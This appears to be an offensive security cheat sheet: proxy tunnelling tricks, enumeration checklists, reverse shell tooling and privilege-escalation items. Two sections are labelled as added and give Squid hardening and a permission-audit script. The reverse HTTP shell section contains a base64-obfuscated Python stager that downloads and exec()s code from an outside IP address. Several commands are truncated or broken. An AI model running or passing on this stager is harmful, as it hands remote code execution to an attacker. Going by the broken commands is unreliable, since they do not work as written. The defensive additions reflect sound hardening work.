# Useful scripts and commands

VNC over an SSH tunnel:

```
sudo tightvncserver -geometry 1024x768
ssh -L 5901:localhost:5901 -i .ssh/ -N -f
```

# SSH over HTTP (Squid)

**socat**

```
socat TCP-L:9999,fork,reuseaddr PROXY:192.168.1.41:127.0.0.1:22,proxyport=3128
ssh -p 9999
```

**proxytunnel**

```
proxytunnel -p 192.168.1.41:3128 -d 127.0.0.1:22 -a 5555
ssh -p 5555
```

**proxychains** (proxy entry in proxychains.conf)

```
http 192.168.1.41 3128
proxychains ssh
```

**corkscrew**

```
ssh -t /bin/sh
```

# Web

- dirsearch big.txt -e sh,txt,htm,php,cgi,html,pl,bak,old
- banner inspection
- review source code
- bruteforce with a cewl-based dictionary
- searchsploit: look at versions properly
- test all the paths with the exploits, mangle them
- nmap --script vuln
- nmap --script safe (ssl-cert, virtual hosts)
- always intercept with Burp
- nikto -h
- LFI, RFI, SQL, RCE, XXE, SSRF injections
- PUT method on all directories
- change POST body encoding with Burp
- bruteforce parameter names
- dirsearch with cookie once authenticated
- download the vulnerable application from exploit-db and examine it

# SSH

- shellshock
- bruteforce
- user_enum
- Debian OpenSSL Predictable PRNG

# SMB

- nmap --script vuln
- nmap --script smb*
- nmap --script smb-enum-shares,smb-ls
- enum4linux

# Exploit troubleshooting

- change shellcode
- make sure all bad chars are removed
- read the exploit properly in case it modifies the shellcode
- capture traffic with Wireshark to make sure the entire shellcode is transmitted
- run the exploit several times
- make sure the JMP ESP matches the OS and language

# Web shells

- test:
- simple shell:
- file upload: `') ?>`
- file upload evasion: rot13 + urlencode

# Reverse shells

- all pentestmonkey reverse shells
- msfvenom x86/linux/shell_reverse_tcp -f elf
- Metasploit `web_delivery` module
- which wget | nc

# SQLi UNION

Search for the response in the HTML source code.

# Reverse HTTP Shell through Proxy

```
use payload/python/meterpreter/reverse_http
```

```
python -c "import base64,sys; exec(base64.b64decode('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnUHJveHlIYW5kbGVyJ10pCmhzPVtdCmhzLmFwcGVuZCh1bC5Qcm94eUhhbmRsZXIoeydodHRwJzonaHR0cDovLzE5Mi4xNjguMTA3LjIzMjo4MDgwJ30pKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cDovLzE3OC42Mi41OC4zNTo4MC9qOTkzQScpLnJlYWQoKSkK'))"
```

Finally we set up the handler.

# Privilege escalation

- sudo -l
- kernel exploits
- OS exploits
- password reuse (mysql, .bash_history, nf.)
- known binaries with suid flag and interactive (nmap)
- custom binaries with suid flag, either using other binaries or with command execution
- writable files owned by root that get executed (cronjobs)
- MySQL as root
- vulnerable services (chkrootkit, logrotate)
- writable /etc/passwd
- readable .ssh/
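Every SSH-over-HTTP variant in the Squid section depends on the proxy honouring a CONNECT to an arbitrary destination, here 127.0.0.1:22 on the proxy host itself. As an added example that is not part of the original page, the two Squid policies below contrast that permissive state with the restrictions Squid ships in its default squid.conf; they are alternatives for the `http_access` section of a squid.conf, not one file, and the `localnet` range 192.168.1.0/24 is an assumption for this example.

```squid
# Added example (not from the original page): two alternative Squid policies.

# WEAK: the state the tunnelling commands rely on. Any client may CONNECT
# to any host:port through the proxy, so a CONNECT to 127.0.0.1:22 succeeds.
acl CONNECT method CONNECT
http_access allow CONNECT
http_access allow all

# CORRECTED: the shape of Squid's shipped defaults. Rules are first-match.
# localnet is assumed to be 192.168.1.0/24 for this example.
acl localnet src 192.168.1.0/24
acl SSL_ports port 443
acl Safe_ports port 80
acl Safe_ports port 443
acl CONNECT method CONNECT
acl to_loopback dst 127.0.0.0/8 ::1
# no plain requests to unusual ports
http_access deny !Safe_ports
# CONNECT only to 443: a CONNECT to port 22 is refused
http_access deny CONNECT !SSL_ports
# never proxy to the proxy host's own loopback addresses
http_access deny to_loopback
http_access allow localnet
http_access deny all
```

For detection, Squid's access.log records the method and the `host:port` of each CONNECT, so a CONNECT whose port is not 443, or whose destination is a loopback or RFC 1918 address, is a one-line log query; under the corrected policy those requests are also logged as denied rather than served.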
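The privilege-escalation list doubles as a hardening checklist. The POSIX shell script below is an added example, not from the original page, that turns three of its items into repeatable checks: group- or world-writable files that root executes or trusts (the /etc/passwd and cronjob items) and an inventory of setuid binaries to compare against a known-good baseline. Every path is an argument so the functions can be run against a test tree; /etc/passwd, /etc/crontab, /etc/cron.d and /usr in `audit_system` are assumed typical locations.

```shell
#!/bin/sh
# Added example (not from the original page): hardening audit for items on the
# privilege-escalation checklist. Run "sh audit.sh --run" to check the assumed
# standard locations, or call the functions on any path.

# Print "WRITABLE <path>" and return 0 if <path> is group- or world-writable;
# return 1 and print nothing when it is absent or has sane permissions.
# -prune stops find from descending, so the test applies to the path itself.
check_loose_perms() {
    p="$1"
    [ -e "$p" ] || return 1
    if find "$p" -prune \( -perm -002 -o -perm -020 \) -print | grep -q .; then
        echo "WRITABLE $p"
        return 0
    fi
    return 1
}

# Audit every regular file directly under a directory (e.g. /etc/cron.d):
# prints one line per finding, then the number of findings on the last line.
audit_dir_files() {
    d="$1"
    n=0
    for f in "$d"/*; do
        [ -f "$f" ] || continue
        if check_loose_perms "$f"; then
            n=$((n + 1))
        fi
    done
    echo "$n"
}

# Sorted inventory of setuid files below a root, staying on one filesystem.
# Diff the output against a baseline taken when the host was known good.
list_suid() {
    find "$1" -xdev -type f -perm -4000 -print 2>/dev/null | sort
}

# Assumed standard locations for a full run.
audit_system() {
    check_loose_perms /etc/passwd
    check_loose_perms /etc/crontab
    audit_dir_files /etc/cron.d
    list_suid /usr
}

case "${1:-}" in
    --run) audit_system ;;
esac
```

A clean host prints only the setuid inventory and a `0` for the cron directory; any `WRITABLE` line is a finding to fix (`chmod 644`) and to investigate, since a writable root-owned cron file or passwd file is exactly what the checklist above looks for.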